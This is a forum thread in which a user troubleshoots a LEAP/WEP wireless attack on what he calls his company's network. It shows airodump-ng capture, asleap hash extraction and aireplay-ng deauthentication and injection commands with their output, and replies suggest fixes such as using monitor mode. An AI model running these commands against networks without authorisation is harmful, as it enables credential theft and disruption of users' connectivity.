LEAP Attack question (missing some auths and deauth not working).

[rick.m]

Hey wireless specialists

It's my first post, I would be very helpful if someone could help me with my questions.

I'm learning about attacking at WEP LEAP authentication network.

Basically my network is a Cisco AP configured with WEP LEAP authenticating at a LDAP (integrated with my Domain Controller).

I have 3 different APs with the same configuration, to cover all our company space, all have the same BSSID - and it's not broadcasted.

I was able to see my network with kismet or airodump-ng, and I can extract a few hashes (with asleap) from the .pcap file generated by airodump-ng. But my problem and question is, why I can't see and extract all the hashes authenticating? And why I can't force existent clients to de-authenticate and authenticate again to collect the hashes.

Well, my airodump-ng has output like:

airodump-ng -w ch06 --channel 06 --bssid 00:26:43:22:85:A2 wlan0

CH 6 ][ Elapsed: 1 min ][ 2009-12-15 13:33

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:43:22:85:A2 -27 7 273 208 0 6 54e. WEP WEP FWCHP

BSSID STATION PWR Rate Lost Packets Probes

00:26:43:22:85:A2 00:23:CB:82:AA:90 -17 2e-54 5 235
00:26:43:22:85:A2 00:1E:65:A2:49:7C -21 54e-54e 4 16
00:26:43:22:85:A2 00:13:E8:1C:A3:90 -32 54e-18e 0 13
00:26:43:22:85:A2 00:1B:77:2C:8F:FA -40 36e-48e 0 12
00:26:43:22:85:A2 00:13:02:C4:76:14 -42 36e-36e 0 23
00:26:43:22:85:A2 00:1C:BF:22:AC:92 -35 5e- 1e 28 192

As you can see, I was targeting a specific AP (from my 3) that is working at channel 6 and with BSSID 00:26:43:22:85:A2. The name of my SSID is FWCHP. Is not strange no clients from my 6 active connections never probe it?

Most of the time, I never get hashes captured, if I look at the pcap files I just get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
Closing pcap ...

Before read the .cap file with asleap I disconnected from the AP and authenticated again and no hash was collected.

To make sure that I was doing all right, I powered down the machine and started again and authenticated again and the same happened, no hashes collected at my attacking machine as demonstrated above. Any guess why?

If I keep it running for more time, sometimes I get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
LEAP Response, but does not match ID for previously observed request frame (136/154).
LEAP Response, but does not match ID for previously observed request frame (136/154).
Closing pcap ...

It's strange, since I was connected in the specific channel, specific BSSID and waiting for more than 4 hours. Also, I reconnected and connected several times and no hashes. I don't understand why I'm not capturing it and it's telling that the tool is unable to match the ID. Any guess why it's happening?

My first try, was force clients (stations) to disconnect / de-authenticate and consequently when they connect again I should get the hashes, right?

I did like:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --deauth 15 wlan0
13:42:49 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:42:51 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:52 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:53 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:54 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:55 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:56 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:57 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:58 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:59 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:00 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:01 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:03 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:43:04 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:05 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 3| 0 ACKs]
13:43:06 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]

But it never generate any hash. And the worst, the client (station) 00:23:CB:82:AA:90 never got disconnected. The machine was on my side and I was looking for it all the time and it never lose connectivity.

Strange, not? Any guess why?

I did this test, since I believe it may help:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --test wlan0
13:48:07 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:48:07 Trying broadcast probe requests...
13:48:09 No Answer...
13:48:09 Found 1 AP

13:48:09 Trying directed probe requests...
13:48:09 00:26:43:22:85:A2 - channel: 6 - 'FWCHP'
13:48:16 0/30: 0%

I will be very help if someone could give me hints to improve my attack and explain me where I'm failing or doing things wrong.

I'm using BackTrack.

Thanks.

Regards,

[dustyboner]

13:48:09 Trying directed probe requests...
13:48:09 00:26:43:22:85:A2 - channel: 6 - 'FWCHP'
13:48:16 0/30: 0%

0/30: 0% means injection isn't working

[rick.m]

Hi dustyboner,

Thanks for your reply.

Yes, I saw the output of the injection and it's failing. But my question is why? Since I did different tests to try mitigate problems like distance, etc.

- I tried it pretty close from the AP.
- I tried it pretty close from the client.
- I tried it from 10 meter or something like that from the AP.
- I tried it from 10 meter or something like that from the client.

And all resulted in the same output. Also, my APs do not restrict any MAC address.

So, I was thinking and what come to my mind is 2 things:

- My wifi card (the famous RL8287L) is not working properly (maybe unable to inject, etc?).
- I'm doing something wrong, reading documentation I saw other commands to test injection like:

ireplay-ng -9 -e NetworkName -a AP-Mac wlan0

I will try it and see what happen.

What called my attention is the number of ACK when deauthing, my number is very slow, but based on the different tests that I did I excluded the problems documented at:

Aircrack-ng wiki for deauth.

About the missing hashes, the location can be discarded since I did 4 new tests pretty close from AP, Client and also with a 10 meter distance to all of them, right?

Any guess why it may be happening?

Thanks

[MikeCa]

What about your a/b/g/n type and link speed? Having settings that don't match the client can pose issues.

[g3ksan]

It actually looks like your card is not in monitor mode. In following the aircrack wiki's instructions, I found that using mon0 vs wlan0 actually worked when I was trying to do a deauth attack against my WEP enabled AP.

Check that first. airmon-ng [Aircrack-ng]

[dustyboner]

Also, make sure Wicd and wpa_supplicant aren't running.

[rick.m]

Hi Mikec,

What about your a/b/g/n type and link speed? Having settings that don't match the client can pose issues.

Hummm... I was not aware that it could be a problem. I had in my mind that aircrack-ng toold was able to handle all of that.

Do you have some link explaining how to set my /b/g/n type and link speed? Well, in special explaining how to identify too the better type and speed for my target Wifi network.

I have a Alpha card, not sure if it makes difference. I looked at the google, but I can't see any special document about it, neither at aircrack-ng wiki.

Thanks.

Hi g3ksan,

It actually looks like your card is not in monitor mode. In following the aircrack wiki's instructions, I found that using mon0 vs wlan0 actually worked when I was trying to do a deauth attack against my WEP enabled AP.

Check that first. Aircrack-ng[/url]

Thank you for the link. I just tried my aircrack-ng test with mon0 instead of wlan0 and it not at least say it's injecting.

The correct is really use the mon0? Because all the tutorials that I read always use wlan0 - in special with Alpha cards like mine.

Thanks.


MOD EDIT: Please use the edit button instead of making multiple consecutive posts.
Thanks.